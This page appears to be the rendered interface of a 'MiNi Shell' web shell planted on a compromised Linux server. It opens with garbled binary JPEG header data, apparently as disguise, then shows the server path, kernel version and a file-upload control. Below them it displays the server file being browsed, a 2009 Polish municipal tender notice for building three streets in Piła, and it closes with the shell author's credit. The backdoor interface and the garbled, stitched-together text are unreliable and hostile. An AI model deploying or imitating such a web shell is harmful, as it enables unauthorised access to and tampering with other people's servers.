JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090901/144939-N-2009.html

<p class="kh_header"><b>Piła: Budowa ulic: ul. Sowia, Strusia, Żurawia w Pile</b><br>
<b>Numer ogłoszenia: 144939 - 2009; data zamieszczenia: 01.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulic: ul. Sowia, Strusia, Żurawia w Pile.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Budowa ul. Sowiej, jezdna ulicy z kostki betonowej o szer. 6,0 m  na podbudowie z
  kruszywa łamanego. 

Zakres  zamówienia obejmuje wykonanie :
1)  wszelkie niezbędne roboty przygotowawcze, rozbiórkowe, zabezpieczeniowe i odtworzeniowe
2)  okrawężnikowania 
3)robót ziemnych
4)nawierzchni jezdni z kostki betonowej gr.8 cm na podbudowie z kruszywa łamanego ok.4144 m2
5)odwodnienie jezdni poprzez odpowiednie spadki poprzeczne w teren przy drodze
6)progów zwalniających  - 5 szt
7)usunięcie kolizji-regulacja istniejących urządzeń infrastruktury podziemnej
8)wykonanie i uzgodnienie projektu organizacji ruchu na czas budowy  jego realizacja, poniesienie  wszelkich kosztów z tym związanych
9)obsługa geodezyjna i geotechniczna
10)dokumentacji powykonawczej ( 2 komplety ze spisem treści) i inwentaryzacji
     powykonawczej ( 6 szt. ) 

II.Budowa ul. Strusiej jezdnia ulicy z kostki betonowej  o szer. 6,0 m na podbudowie z kruszywa łamanego.
Zakres  zamówienia obejmuje wykonanie :
1)  wszelkie niezbędne roboty przygotowawcze, rozbiórkowe, zabezpieczeniowe i odtworzeniowe
2)  okrawężnikowania 
3)  robót ziemnych     
4)nawierzchni jezdni z kostki betonowej gr. 8 cm na podbudowie z kruszywa łamanego ok.991 m2
5)odwodnienie jezdni poprzez odpowiednie spadki poprzeczne w teren przy drodze
6)progów zwalniających - 2 szt
7)usunięcie kolizji-regulacja istniejących urządzeń infrastruktury podziemnej
8)wykonanie i uzgodnienie projektu organizacji ruchu na czas budowy   jego realizacja, poniesienie wszelkich kosztów z tym związanych
9)obsługa geodezyjna i geotechniczna
10)dokumentacji powykonawczej (2 komplety ze spisem treści) i inwentaryzacji 
      powykonawczej(6 szt. )
III.Budowa ul. Żurawiej jezdnia z kostki betonowej o szer. 6,0 m na podbudowie z kruszywa łamanego 
Zakres  zamówienia obejmuje wykonanie :
1)  wszelkie niezbędne roboty przygotowawcze, rozbiórkowe, zabezpieczeniowe i odtworzeniowe
2)  okrawężnikowania 
3)  robót ziemnych     
4)nawierzchni jezdni z kostki betonowej gr 8 cm na podbudowie z kruszywa łamanego ok.4431 m2
5)odwodnienie jezdni poprzez spadki poprzeczne w teren przy drodze 
6)progów zwalniających - 5 szt 
7)  usunięcie kolizji-regulacja istniejących urządzeń infrastruktury podziemnej
8)wykonanie i uzgodnienie projektu organizacji ruchu na czas budowy jego realizacja, poniesienie
 wszelkich kosztów z tym związanych
9)  obsługa geodezyjna i geotechniczna
10) dokumentacji powykonawczej ( 2 komplety ze spisem treści) i inwentaryzacji 
 powykonawczej ( 6 szt. )
Przedmiot zamówienia określa projekt budowlany wraz z częścią kosztorysową oraz szczegółowe specyfikacje techniczne wykonania i odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 15.000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> )	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym   i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do  udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie art. 24 ust. 1i 2 ust.PZP.
5) dysponuje osobami posiadającymi doświadczenie i kwalifikacje odpowiednie do przedmioty zamówienia -
     kierownik budowy z uprawnieniami o specjalności drogowej  
6) wykażą, że w okresie ostatnich 5  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli ten
    okres jest krótszy - w tym okresie, wykonali co najmniej 2 zadania - budowa ulicy o długości ok. 150 m
7) wniosą wadium w wymaganym terminie, wysokości i formie.

W przypadku złożenia oferty wspólnej warunki wyszczególnione w pkt. 1 i 4 muszą spełniać wszyscy wykonawcy, warunki wyszczególnione w pkt. ,2,3,5,6,7 Wykonawcy muszą spełniać łącznie.  
 
Uwaga:
 Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Ofertę na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. Nr 1
2.Oświadczenie o treści określonej w art.22 ust. 1  - Prawo zamówień publicznych -
 wg wzoru  określonego w załączniku Nr 2. 
3.  Dokument wniesienia wadium (kserokopia dokumentu potwierdzona za zgodność z oryginałem).
4.Pełnomocnictwo do reprezentowania w postępowaniu (w przypadku podmiotów występujących     wspólnie) - przygotowane zgodnie z zapisami części III pkt. 4 SIWZ
5 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji
  działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania   ofert) 
W przypadku zaświadczenia o wpisie do ewidencji działalności gospodarczej oznacza to, że powinno być wydane w trybie opisanym w dziale VII Kodeksu PostępowaniaAdministracyjnego- samo stwierdzenie przez organ zgodności z oryginałem z podaniem daty - nie spełnia wymogów ustawy ( nie jest wydaniem zaświadczenia)
6.Aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)     zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie   zalega z opłacaniem podatków i opłat lub zaświadczenie, że Wykonawca uzyskał przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonanie decyzji właściwego organu; 
7.Aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)
zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy
Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości   wykonanie decyzji właściwego organu;
8.Aktualną (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
informację z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 4 - 8 ustawy
Prawo zamówień publicznych.
9.Aktualna (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
informacja z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 9 ustawy -   Prawo zamówień publicznych.
10.Wykaz wykonanych w ciągu ostatnich pięciu  lat przed dniem wszczęcia postępowania o
udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
 wykonali co najmniej 2 zadania - budowy ulicy o długości ok. 150 m każda z podaniem ich  wartości     oraz  daty i miejsca wykonania - wg  wzoru stanowiącego załącznik Nr 3.
 Do wykazu należy dołączyć  dokumenty potwierdzające, że roboty te zostały wykonane należycie;
11. Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć     w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych ,
 doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu   wykonywanych przez nich  czynności (załącznik nr 4);
Do wykazu należy dołączyć kopie uprawnień potwierdzających kwalifikacje niezbędne do wykonania przedmiotu zamówienia wraz z aktualnym wpisem do właściwej Izby Inż. Bud.
11a. Pisemne zobowiązanie innych podmiotów do udostępniane osób zdolnych do wykonania
zamówienia,  jeżeli w wykazie, o którym mowa w pkt. 5 wykonawca wskazał osoby, którymi  będzie dysponował.
12. Wykaz części zamówienia, której wykonanie zamierza powierzyć podwykonawcą  (załącznik nr 5);
13.Parafowany projekt umowy jako akceptacja jej treści i warunków
14. Zbiorcze zestawienie kosztów - załącznik nr 6
15. Kosztorys ofertowy uproszczony sporządzony wg wzoru stanowiącego załącznik do SIWZ   
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej
 amiast dokumentów o których mowa w:
  .)  pkt 2 ppkt 5,6,7 i 9 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę
      lub miejsce zamieszkania, potwierdzające odpowiednio że:
    a) nie otwarto likwidacji ani nie ogłoszono upadłości
    b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne
 albo że uzyskał przewidziane prawem zwolniene, odroczenie lub rozłożenie na raty zaległych
 płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
    c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.  

    Dokumenty, o których mowa wyżej  lit. a i c , powinny być wystawione nie wcześnej niż 6 miesięcy przed upływem terminu składania ofert. Dokument o którym mowa w  lit. b, powinień być wystawiony nie wcześniej 
niż 3 miesiące przed upływem  terminu składania ofert.
.) pkt. 2 ppkt 8 - składa zaświadczenie właściwego organu sądowego lub administracyjnego  kraju pochodzenia
    lub zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,
     wystawione nie wcześniej niż 6 miesięcy  przed upływem składania ofert.
    Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów , o których mowa wyżej , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju poczodzenia osoby lub kraju w którym wykonawca ma siedzibę lub   miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pila.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.pila.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 09:00, miejsce: siedziba Zamawiającego pok. 136  pietro I.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com